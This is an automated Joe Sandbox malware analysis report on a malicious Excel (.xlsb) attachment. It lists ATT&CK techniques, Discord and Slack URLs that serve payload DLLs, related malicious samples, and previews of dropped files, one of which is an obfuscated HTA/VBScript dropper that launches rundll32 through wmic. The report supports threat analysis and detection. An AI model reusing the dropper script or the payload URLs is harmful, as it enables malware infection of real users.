Default Accounts	Exploitation for Client Execution23	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Modify Registry1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	Remote System Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	File and Directory Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	System Information Discovery15	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://cdn.di	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.135.233	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com/attachments/890212086519566369/890212261132636200/5_samsrv.dll.dll	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	false		high
http://investor.msn.com	mshta.exe, 00000004.00000002.703755437.0000000003030000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703478430.0000000003B40000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	mshta.exe, 00000004.00000002.703755437.0000000003030000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703478430.0000000003B40000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	false		high
https://cdn.discordapp.com/attachments/890212086519566369/890212261132636200/5_samsrv.dll.dllievKp	mshta.exe, 00000004.00000002.702108672.00000000003B0000.00000004.00000020.sdmp	false		high
https://cdn.discordapp.com/attachments/890212591471824921/890212677559922708/9_dispex.dll.dll=	mshta.exe, 00000004.00000002.702130529.00000000003BB000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/server1.crl0	mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net03	mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/890212086519566369/890212261132636200/5_samsrv.dll.dllgfhG28	mshta.exe, 00000004.00000002.702083806.000000000038D000.00000004.00000020.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com/	mshta.exe, 00000004.00000002.705522984.00000000045CF000.00000004.00000001.sdmp	false		high
https://files.slack.com/files-pri/T02EHM1BB19-F02FFGMT84C/download/6_hpzstw72?pub_secret=009a86b011	mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.702083806.000000000038D000.00000004.00000020.sdmp, mshta.exe, 00000004.00000003.445778489.000000000047B000.00000004.00000001.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	mshta.exe, 00000004.00000002.703943748.0000000003217000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703886169.0000000003D27000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458877846.0000000001DC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	mshta.exe, 00000004.00000002.703755437.0000000003030000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703478430.0000000003B40000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	false		high
https://cdn.discordapp.com/attachments/890212086519566369/890212251435425862/0_system.componentmodel	mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.702282644.0000000000472000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.702205557.00000000003FC000.00000004.00000020.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	mshta.exe, 00000004.00000002.706306833.0000000004D7B000.00000004.00000040.sdmp	false		high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	mshta.exe, 00000004.00000002.703943748.0000000003217000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703886169.0000000003D27000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458877846.0000000001DC7000.00000002.00020000.sdmp	false		high
https://www.cloudflare.com/5xx-error	mshta.exe, 00000004.00000002.704938786.0000000004325000.00000004.00000040.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	mshta.exe, 00000004.00000002.703943748.0000000003217000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703886169.0000000003D27000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458877846.0000000001DC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
https://files.slack.com/files-pri/T02ERNYLC69-F02F9AG9CEN/download/6_hpzstw72?pub_secret=356a094b3b	mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.445778489.000000000047B000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	mshta.exe, 00000004.00000002.704140330.0000000003410000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.704087374.0000000003F20000.00000002.00020000.sdmp	false		high
https://files.slack.com/files-pri/T02F79UM6TT-F02F9AE9ZJ6/download/3_SmiEngine?pub_secret=4e9eeb9360	mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.445778489.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.702108672.00000000003B0000.00000004.00000020.sdmp	false		high
http://investor.msn.com/	mshta.exe, 00000004.00000002.703755437.0000000003030000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703478430.0000000003B40000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	false		high
https://cdn.discordapp.com/attachments/890212086519566369/890212261132636200/5_samsrv.dll.dllhCvNhM	mshta.exe, 00000004.00000002.702083806.000000000038D000.00000004.00000020.sdmp	false		high
https://files.slack.com/files-pri/T02ERNYLC69-F02F9AG9CEN/download/6_hpzstw72?pub_secret=356a094b3bm	mshta.exe, 00000004.00000002.702044962.000000000035E000.00000004.00000020.sdmp	false		high
https://cdn.di	mshta.exe, 00000004.00000002.702282644.0000000000472000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.%s.comPA	mshta.exe, 00000004.00000002.704140330.0000000003410000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.704087374.0000000003F20000.00000002.00020000.sdmp	false	URL Reputation: safe	low
https://cdn.discordapp.com/attachments/890212591471824921/890212677559922708/9_dispex.dll.dll	mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.445778489.000000000047B000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net0D	mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	false		high
http://servername/isapibackend.dll	WMIC.exe, 00000002.00000002.445898420.0000000001B20000.00000002.00020000.sdmp, WMIC.exe, 00000007.00000002.453998657.0000000001BE0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/890212591471824921/890212677559922708/9_dispex.dll.dllh	mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.135.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	488098
Start date:	22.09.2021
Start time:	16:26:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Amendment.-0428767170_20210922.xlsb
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.expl.evad.winXLSB@9/12@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsb Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:27:35	API Interceptor	26x Sleep call for process: WMIC.exe modified
16:27:37	API Interceptor	1281x Sleep call for process: mshta.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.159.135.233	mosoxxxHack.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
	Sales-contract-deaho-180521-poweruae.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
	PURCHASE ORDER E3007921.EXE	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
	Waybill Document 22700456.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
	COMPANY REQUIREMENT.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
	Email data form.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/789279517516365865/789279697203757066/angelx.scr
	Down Payment.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
	Vessel details.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/780175015496777751/781048233136226304/mocux.exe
	Teklif Rusya 24 09 2020.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/733818080668680222/758418625429372978/p2.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	MIKPRON GROUP - MATERIAL-REQUIREMENTS.exe	Get hash	malicious	Browse	162.159.135.233
	invoice.exe	Get hash	malicious	Browse	162.159.134.233
	MIKPRON GROUP - MATERIAL-REQUIREMENTS.exe	Get hash	malicious	Browse	162.159.134.233
	enumerar muestras de productos pdf.exe	Get hash	malicious	Browse	162.159.130.233
	P.O-20210922120155.exe	Get hash	malicious	Browse	162.159.129.233
	Document.exe	Get hash	malicious	Browse	162.159.133.233
	Y78VYTy1rQ.exe	Get hash	malicious	Browse	162.159.130.233
	PO #KV18RE001-A5871.pif.exe	Get hash	malicious	Browse	162.159.130.233
	Document.exe	Get hash	malicious	Browse	162.159.134.233
	Billss-1873578583.vbs	Get hash	malicious	Browse	162.159.134.233
	iVYmUHHcoW.exe	Get hash	malicious	Browse	162.159.129.233
	Zam#U00f3wienie zakupu # 49211.exe	Get hash	malicious	Browse	162.159.130.233
	Payment Receipt.exe	Get hash	malicious	Browse	162.159.133.233
	Presupuesto SEPT 21.pif.exe	Get hash	malicious	Browse	162.159.133.233
	Waybill.exe	Get hash	malicious	Browse	162.159.129.233
	I Ordine di acquisto 49211.ppam	Get hash	malicious	Browse	162.159.134.233
	Quotation Sheet.exe	Get hash	malicious	Browse	162.159.135.233
	HT0536CF.exe	Get hash	malicious	Browse	162.159.133.233
	MIKPRON GROUP-MATERIAL-REQUIREMENTS.exe	Get hash	malicious	Browse	162.159.130.233
	taskmgr.exe	Get hash	malicious	Browse	162.159.134.233

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	XJC22GTCOo.exe	Get hash	malicious	Browse	104.16.199.133
	INVITATION_Cross-Asset_Credit Conf_September-22-2021.docx	Get hash	malicious	Browse	104.16.18.94
	Wdg2n6lSFh.dll	Get hash	malicious	Browse	104.20.185.68
	StarFireTV-BOX-2.0.1.9-GDaily.org.apk	Get hash	malicious	Browse	104.21.13.218
	StarFireTV-BOX-2.0.1.9-GDaily.org.apk	Get hash	malicious	Browse	172.67.133.72
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	23.227.38.74
	Order 122001-221.exe	Get hash	malicious	Browse	172.67.179.203
	New Order.exe	Get hash	malicious	Browse	172.67.128.236
	5b3791467736f1092e34142c22aabc83f681542c414c5.dll	Get hash	malicious	Browse	172.67.162.222
	MIKPRON GROUP - MATERIAL-REQUIREMENTS.exe	Get hash	malicious	Browse	172.67.188.154
	invoice.exe	Get hash	malicious	Browse	162.159.134.233
	payment..exe	Get hash	malicious	Browse	172.67.185.197
	2690094.exe	Get hash	malicious	Browse	104.21.9.12
	hSqkX3ZIw4.exe	Get hash	malicious	Browse	104.21.19.200
	MIKPRON GROUP - MATERIAL-REQUIREMENTS.exe	Get hash	malicious	Browse	162.159.134.233
	pFHU35Mh5s.exe	Get hash	malicious	Browse	104.21.9.12
	cMmzeVzjTO.exe	Get hash	malicious	Browse	66.235.200.10
	enumerar muestras de productos pdf.exe	Get hash	malicious	Browse	162.159.130.233
	Documento.ppam	Get hash	malicious	Browse	172.67.135.130
	SWIFT_COPY USD 13420.60.exe	Get hash	malicious	Browse	172.67.188.154

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	INVITATION_Cross-Asset_Credit Conf_September-22-2021.docx	Get hash	malicious	Browse	162.159.135.233
	Srv#8871832.xlsx	Get hash	malicious	Browse	162.159.135.233
	specification-1149726978.xls	Get hash	malicious	Browse	162.159.135.233
	PO no. 275.xlsx	Get hash	malicious	Browse	162.159.135.233
	DHL QA-Tracker.doc	Get hash	malicious	Browse	162.159.135.233
	waffle5.xls	Get hash	malicious	Browse	162.159.135.233
	Pagoswift_usd.xls	Get hash	malicious	Browse	162.159.135.233
	PAYMENT COPY.doc	Get hash	malicious	Browse	162.159.135.233
	waffle4.xls	Get hash	malicious	Browse	162.159.135.233
	DETERMIND..docx	Get hash	malicious	Browse	162.159.135.233
	chart-1896160650.xls	Get hash	malicious	Browse	162.159.135.233
	waffle3.xls	Get hash	malicious	Browse	162.159.135.233
	Payment.xls	Get hash	malicious	Browse	162.159.135.233
	Payment.xls	Get hash	malicious	Browse	162.159.135.233
	rfq.ppt	Get hash	malicious	Browse	162.159.135.233
	5ftS6lek9d.doc	Get hash	malicious	Browse	162.159.135.233
	Swift-Transfer.ppt	Get hash	malicious	Browse	162.159.135.233
	INV.-2584745_20210920.xlsb	Get hash	malicious	Browse	162.159.135.233
	INV.-2592812_20210920.xlsb	Get hash	malicious	Browse	162.159.135.233
	second 2.xlsx	Get hash	malicious	Browse	162.159.135.233

Dropped Files

No context

Created / dropped Files

C:\ProgramData\defdoc.png Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	4363
Entropy (8bit):	4.99823944662746
Encrypted:	false
SSDEEP:	96:1j9jwIjYjyDK/DZD8jH+k1taHuvJADh/pRs5sRszbGD:1j9jhjYjWK/lyH+ktaHuRADh/pm5sRs8
MD5:	C3272A048D96C57A921C90913A0B886D
SHA1:	D897744DAD91653490FD61C7F7B56AB84A3BCA04
SHA-256:	D298217695405DA30E9141588F90794D57033A0345C2C47D04B8B8A2C37403AB
SHA-512:	088590161EE1F677E89F8DB4149EFEB9DC13C454733C1A848A1A51A092BC7312056CD6C337A83F44E9E63C368F046BA3A23871D4D9C7A414FD12516FBA12D4BE
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

C:\ProgramData\defdoc.rtf Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1058
Entropy (8bit):	6.0675967207968995
Encrypted:	false
SSDEEP:	24:hPJTlFE82C4JQObfQGdne5BgAHueoGbDBLE8XHQdZMC7:tzCJQOv6nvoGbdA83GyC7
MD5:	128BA283C8E124564FFB6B48561D8208
SHA1:	0EB3442B1D2348FEC78BB7DA32A10F492D048CC9
SHA-256:	ED4BAEC66CCFE3D8E41E829AA6A1119086775A421F285365C4FEB66929B55625
SHA-512:	B4CC72E6AE22DC5A5C75260A1454360D125E9940CE0F3265A70EFA756D9B2F64D5488DB2BEE0B43BB0F88E5743913DF933E2332828C08A5D680AE6869338FAF3
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="Test"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..'ruTkMQaXxJmOGDPRdic76yr9Qn KrXUGQV3OS1j3xZ3SarRwNCo..'IFhFaVu4kLNJEvBhhQNPtBP7MvpWjlPsmCJ1ht7019mMBsKCO8G0..'a1iSJuZOILVLXIvqKLACHtVE0dsQKDrLoi83aTwDlpDU8g..'DRTJwYdjzOng RkXYvs0B0hRO83yAd1EWYjBePc0zeiw5MElOi8..'wkpr44upa7INT9ybsxZFCCDtM0DQQZumDC4b7Dg5dEIPtMj..With CreateObject("Wscript.Shell").. .Exec("wmic process call create " & Chr(34) & "rundll32.exe C:\\Progr" & "amData\defdoc.p" & "ng " & "FilterCreate" & Chr(34) )..End With 'Q8kq5EwQihUmwGKNfspzG5U3lFnd2sXSwyOaeWku4 EmebPnNZ4 1..'Ymd2sl8q7ewZ5b50hHFKQVFWNadxGaIU62RgsTOLToN72UyHgjK94WS MTH..'va1PKFZqKyx87p2QjERlQ9i8LHXramMXcm9a18HkfXrBHpH0ODp..'RqI1Tn2bQYPXO5 bKtbnywZn3dlDQCt7cjvb1IRZzYN0tT..'kZj5iWtdzwnpyORb59YU4XApqCfcbzuxHHzz32EerZWS tLZiBzsO0XKeRT..'5HO84zC5rpE1TEievKpbwwQ8xBazPD5xwCevvs5e

C:\ProgramData\gvREyChXMcc.rtf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	112522501
Entropy (8bit):	4.425813133790814
Encrypted:	false
SSDEEP:	3072:cU8lmUu86Q3rWwCkOpB0/T7nG0rHLzv+ceTPnriYzJxttQSwPDLX2hJQiEuJhYch:izSR+lA
MD5:	90DB7D1F09D8F53246A5BDAF60E4A748
SHA1:	112AD52227010FEB3069677B30DE026D52B79585
SHA-256:	4FA621833C760617E6D34C11C842F2181312A0252979E229E9A6431704784366
SHA-512:	8CD8B87B3E2E50E411DD436EB3D24195FCA93E8BBD6F3A39E686CF1A7F2C0829219BC5B535F02972C36F38F3CD4076B25F6CFC78095ADA21F53C126D0341F007
Malicious:	true
Preview:	<<!<!D<!DO<!DOC<!DOCT<!DOCTY<!DOCTYP<!DOCTYPE<!DOCTYPE <!DOCTYPE h<!DOCTYPE ht<!DOCTYPE htm<!DOCTYPE html<!DOCTYPE html><!DOCTYPE html>.<!DOCTYPE html>..<!DOCTYPE html>..<<!DOCTYPE html>..<h<!DOCTYPE html>..<ht<!DOCTYPE html>..<htm<!DOCTYPE html>..<html<!DOCTYPE html>..<html><!DOCTYPE html>..<html>.<!DOCTYPE html>..<html>..<!DOCTYPE html>..<html>..<<!DOCTYPE html>..<html>..<h<!DOCTYPE html>..<html>..<he<!DOCTYPE html>..<html>..<hea<!DOCTYPE html>..<html>..<head<!DOCTYPE html>..<html>..<head><!DOCTYPE html>..<html>..<head>.<!DOCTYPE html>..<html>..<head>..<!DOCTYPE html>..<html>..<head>..<<!DOCTYPE html>..<html>..<head>..<H<!DOCTYPE html>..<html>..<head>..<HT<!DOCTYPE html>..<html>..<head>..<HTA<!DOCTYPE html>..<html>..<head>..<HTA:<!DOCTYPE html>..<html>..<head>..<HTA:A<!DOCTYPE html>..<html>..<head>..<HTA:AP<!DOCTYPE html>..<html>..<head>..<HTA:APP<!DOCTYPE html>..<html>..<head>..<HTA:APPL<!DOCTYPE html>..<html>..<head>..<HTA:APPLI<!DOCTYPE html>..<html>..<head>..<HTA:APPLIC<!DOCTYPE

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5_samsrv.dll[1].htm Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	4363
Entropy (8bit):	4.99823944662746
Encrypted:	false
SSDEEP:
MD5:	C3272A048D96C57A921C90913A0B886D
SHA1:	D897744DAD91653490FD61C7F7B56AB84A3BCA04
SHA-256:	D298217695405DA30E9141588F90794D57033A0345C2C47D04B8B8A2C37403AB
SHA-512:	088590161EE1F677E89F8DB4149EFEB9DC13C454733C1A848A1A51A092BC7312056CD6C337A83F44E9E63C368F046BA3A23871D4D9C7A414FD12516FBA12D4BE
Malicious:	false
IE Cache URL:	https://cdn.discordapp.com/attachments/890212086519566369/890212261132636200/5_samsrv.dll.dll
Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC3E021B.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1920 x 1020, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	55497
Entropy (8bit):	7.507072403097468
Encrypted:	false
SSDEEP:
MD5:	7FFA7812738F2018A1A9B7D92040A023
SHA1:	1B4498308C790F766B956D9902421A111FC106D4
SHA-256:	00DA94F6C275AACFA87701102A88A7EC0929DA8BD32506A8081AFC80F886F05A
SHA-512:	F404531E8AB36D41CEA729FCF0B054668DA36EA266DD1227BD9011B1B3CACC7230DA792D0A4D13E4730142B09E8987B5719F323DBBD9BA2B36DCE7E1492B489D
Malicious:	false
Preview:	.PNG........IHDR................o.. .IDATx.......}....[.].^H..`.E,.$.*.%...+.Kl+o..;ql.._.%9.-v.8..&.%Y.%Y..B..H.w...H......o.y.o.}...E[,H`...\..3.<3s.<.........T............^.-.........................f..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!............i..)..o..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!............`. ..........................f..`...........!...

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Amendment.-0428767170_20210922.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 22 22:27:58 2021, mtime=Wed Sep 22 22:27:58 2021, atime=Wed Sep 22 22:27:58 2021, length=105555, window=hide
Category:	modified
Size (bytes):	2294
Entropy (8bit):	4.50313942057587
Encrypted:	false
SSDEEP:
MD5:	6F3E85378ADADC69DD65B4B2A8CC4E2F
SHA1:	0CBC9F5896113593EC9800C43525351C86CA3DF4
SHA-256:	EC85DA769CF591F36AF9DD61A7600ED8B0CCBA51630DFA24763BB80E33E1BC1E
SHA-512:	2D3E64BEB8E0783C1C3C54E0DDE67B11C748B02E18A7FF89F850749B1C7EB57CCE718CCEEE7F0578E1AA9496B5114BC7919A7F3670A3FE22B2C1BCE83F1E124D
Malicious:	false
Preview:	L..................F.... .....Ez......Ez.....>Oz....S............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!....&=....U...............A.l.b.u.s.......1.....6S....DOCUME~1..h......QK.X6S.....[=..............>.....D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.......2.S...6S.. .AMENDM~1.XLS..t......6S..6S...........................A.m.e.n.d.m.e.n.t...-.0.4.2.8.7.6.7.1.7.0._.2.0.2.1.0.9.2.2...x.l.s.b.......................-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Documents\Amendment.-0428767170_20210922.xlsb.<.....\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.\.A.m.e.n.d.m.e.n.t...-.0.4.2.8.7.6.7.1.7.0._.2.0.2.1.0.9.2.2...x.l.s.b.............m...............#.F..l.H.i.m...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\My Documents.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
